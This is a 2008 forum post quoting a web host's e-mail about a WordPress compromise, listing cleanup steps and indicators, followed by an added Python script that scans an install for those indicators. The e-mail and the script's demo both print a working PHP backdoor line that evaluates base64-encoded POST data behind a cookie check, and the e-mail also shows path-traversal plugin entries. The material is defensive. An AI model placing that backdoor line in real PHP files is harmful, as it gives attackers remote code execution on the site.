Greenguy's Board
2008-04-28, 01:43 PM   #1
walrus
Join Date: May 2005
Location: Los Angeles
Posts: 1,773
Wordpress Exploits

They must be on the rise, as I just received this e-mail from my new host:
Quote:
Over the last couple of weeks there has been a widespread WordPress exploit that seems to have infected all versions of WordPress except for the most recent release (2.5.1) and has started to hit accounts hosted on our servers.
You can read more about the exploit here:

http://wordpress.org/support/topic/168964?replies=30

It has been noted that one exploited install on a server may affect all installs on the same server.
Besides upgrading your install to the most recent release, there are a few other things to look for and the steps required to clean-up the exploit.
Before doing anything please BACKUP your database(s). This can be done in your control panel under the "Database Management" link. The database backup will be placed in the /BACKUPS directory and accessible via FTP.


1) New files named wp-info.txt which contain database usernames and passwords.

This file will contain user info dumped from your database (emails, usernames, passwords, etc.)
If you do find this file, remove it AND change all of your passwords including your visitors' passwords.
On the few WordPress installs that we have investigated we have not come across this file yet, so this file may or may not exist on an infected install.


2) New files ending in _new, _old, .pngg, .jpgg, .giff appearing inside writable directories.

These files will have the same name as an existing file but will have one of the following extensions:

_new.php
_old.php
.php.pngg
.php.jpgg
.php.giff

These files are executable when called from a browser and will display a fake 404 error, but will display server system info when called from a script with the matching hash from one of the hacked php scripts.
Delete these files if found.


3) Extra code added to the first line of PHP files.

This code is added to the first line of php files and provides access to the backdoor account.
The letters and numbers in the code may vary from the following, but it will have the same format:

<?php if(md5($_COOKIE['_wp_debugger'])=="dfa1bcf40aa72fdb46ed40f7651fe76e"){ eval(base64_decode($_POST['file'])); exit; } ?>

This code will need to be removed from each file.
On the few WordPress installs that we have investigated, this line has only been seen in files with the extensions from step 2.


4) New "WordPress" user in database (hidden in the admin panel user's page).

This user will have no info saved for password and an add date of all zeroes.
You will need to delete this user. You can do this via phpMyAdmin. There is a link to phpMyAdmin in your control panel Database Management page.
Browse the wp_users table and remove the "WordPress" user.


5) WordPress version changed to 2.5

Although you are running an older version of WordPress, your admin panel may say that you are running version 2.5.
The active_plugins record in your wp_options table may contain entries similar to the following:

i:3;s:54:"../../wp-content/themes/xxxx/404_old.gif";
i:4;s:117:"../../../../../../../../../../../../../../../../../../../../../../tmp/tmpnyQVsn/sess_1695814591293aea19710bfb3dcfc0b9";

Remove these entries by editing the record with phpMyAdmin.
Browse the wp_options table and edit the active_plugins record.


6) Upgrade your WordPress to the most recent version.

Upgrade immediately.
You can download version 2.5.1 here: http://wordpress.org/latest.zip
Instructions for upgrading your install can be found here: http://codex.wordpress.org/Upgrading_WordPress

Although WordPress suggests/requires some directories to be 777 to function, do NOT set them to 777.
Specifically, the /wp-uploads, /wp-themes, and /wp-plugins directories are set to 777 so that you can edit them in the administration panel, but this is an open door for a hacker.
755 is the maximum permissions that should be set on any directory.


If you believe your WordPress install has been exploited, open a ticket (support@atcihosting.com) and we can run a search and removal of the files listed in steps 1 and 2.
You will need to complete the rest of the steps in order to clean your install.


Please contact us with any questions.
So on top of trying to get something going on XXX Blog and Porn Blog Surfer...and having lost the database to LO...I now get to upgrade all of my WP installs, change out plug-ins, and modify templates for the new WP.

Sometimes the gods just like to fuck with you!
__________________
Naked Girlfriend Porn TGP
free partner account
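The host's e-mail describes the indicators by hand (a wp-info.txt dump, renamed script copies, an injected first line, a hidden database user, junk active_plugins entries, and 777 directories). The script below is an added example, written for this thread and not the host's own tooling or anything shipped with WordPress, that automates the file-system and active_plugins checks from steps 1, 2, 3, 5 and 6 across an install. It assumes the suffix list and first-line structure quoted in the e-mail (the cookie name, hash and POST field are treated as variable), that active_plugins is a PHP-serialized array of strings, and that any entry containing ".." or an absolute path or not ending in .php is worth a look. The demo tree it builds is constructed for illustration; the backdoored file uses a placeholder hash of zeros. The database user from step 4 still has to be checked in phpMyAdmin as the e-mail says.

```python
"""Scan a WordPress install for the indicators in the host's cleanup e-mail.
Constructed example: not the host's tooling and not part of WordPress."""
import os
import re
import stat
import shutil
import tempfile

# Step 2: a copy of an existing script saved under one of these suffixes.
SUSPICIOUS_SUFFIXES = ("_new.php", "_old.php", ".php.pngg", ".php.jpgg", ".php.giff")

# Step 3: first-line backdoor of the form
#   <?php if(md5($_COOKIE['...'])=="<32 hex>"){ eval(base64_decode($_POST['...'])); exit; } ?>
# The cookie name, hash and POST field vary, so only the structure is matched.
BACKDOOR_LINE = re.compile(
    r'md5\(\$_COOKIE\[[^\]]+\]\)\s*==\s*"[0-9a-f]{32}".*'
    r'eval\(base64_decode\(\$_POST\['
)

def _rel(path, root):
    """Path relative to root, with forward slashes so results are stable."""
    return os.path.relpath(path, root).replace(os.sep, "/")

def scan_tree(root):
    """Walk root and return sorted findings per indicator category."""
    findings = {"wp_info": [], "suffix": [], "first_line": [], "world_writable": []}
    for dirpath, dirs, files in os.walk(root):
        for d in dirs:                                   # step 6: world-writable (777) directories
            full = os.path.join(dirpath, d)
            if os.stat(full).st_mode & stat.S_IWOTH:
                findings["world_writable"].append(_rel(full, root))
        for name in files:
            path = os.path.join(dirpath, name)
            if name == "wp-info.txt":                    # step 1: credential dump
                findings["wp_info"].append(_rel(path, root))
            if name.endswith(SUSPICIOUS_SUFFIXES):       # step 2: renamed copies
                findings["suffix"].append(_rel(path, root))
            if ".php" in name:                           # step 3: injected first line
                with open(path, "r", errors="replace") as fh:
                    first_line = fh.readline()
                if BACKDOOR_LINE.search(first_line):
                    findings["first_line"].append(_rel(path, root))
    for hits in findings.values():
        hits.sort()
    return findings

# Step 5: active_plugins is a PHP-serialized array of strings such as
#   a:2:{i:0;s:19:"akismet/akismet.php";i:1;s:40:"../../...";}
_STRING_HEADER = re.compile(r's:(\d+):"')

def active_plugins_entries(serialized):
    """Extract each string from the serialized array using its declared length."""
    entries, pos = [], 0
    while True:
        m = _STRING_HEADER.search(serialized, pos)
        if m is None:
            return entries
        start = m.end()
        end = start + int(m.group(1))
        entries.append(serialized[start:end])
        pos = end

def suspicious_plugins(serialized):
    """A legitimate entry is a relative .php path with no directory traversal."""
    return [e for e in active_plugins_entries(serialized)
            if ".." in e or e.startswith("/") or not e.endswith(".php")]

def build_demo_tree():
    """Create a throwaway install (constructed): one clean theme file, one
    backdoored copy, a wp-info.txt dump and a 777 uploads directory."""
    root = tempfile.mkdtemp(prefix="wpscan_")
    theme = os.path.join(root, "wp-content", "themes", "demo")
    uploads = os.path.join(root, "wp-content", "uploads")
    for d in (os.path.join(root, "wp-content"),
              os.path.join(root, "wp-content", "themes"), theme, uploads):
        os.makedirs(d, exist_ok=True)
        os.chmod(d, 0o755)                # set explicitly so the umask does not matter
    os.chmod(uploads, 0o777)
    with open(os.path.join(theme, "404.php"), "w") as fh:
        fh.write("<?php get_header(); ?>\n")
    with open(os.path.join(theme, "404_old.php"), "w") as fh:   # placeholder hash of zeros
        fh.write('<?php if(md5($_COOKIE[\'_wp_debugger\'])=="' + "0" * 32
                 + '"){ eval(base64_decode($_POST[\'file\'])); exit; } ?>\n')
    with open(os.path.join(root, "wp-info.txt"), "w") as fh:
        fh.write("constructed placeholder, no real credentials\n")
    return root

if __name__ == "__main__":
    root = build_demo_tree()
    try:
        for category, hits in scan_tree(root).items():
            print(category, hits)
    finally:
        shutil.rmtree(root)
```

Point scan_tree at the document root of a real install to get the file-system findings; paste the active_plugins value from phpMyAdmin into suspicious_plugins to see which entries to strip before saving the record. The string parser honours the declared byte length rather than splitting on quotes, so an entry containing a quote cannot throw it off.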